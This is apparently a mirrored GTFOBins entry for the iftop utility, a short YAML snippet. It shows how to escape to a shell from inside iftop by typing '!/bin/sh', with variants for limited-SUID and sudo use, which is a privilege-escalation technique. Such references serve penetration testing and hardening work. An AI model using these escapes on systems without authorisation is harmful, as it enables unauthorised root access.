1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/iftop.md
2021-03-02 17:10:53 +01:00

17 lines
310 B
Markdown

---
description: This requires `iftop` 0.17 and the privilege to capture on some device (specify with `-i` if needed) .
functions:
shell:
- code: |
iftop
!/bin/sh
limited-suid:
- code: |
./iftop
!/bin/sh
sudo:
- code: |
sudo iftop
!/bin/sh
---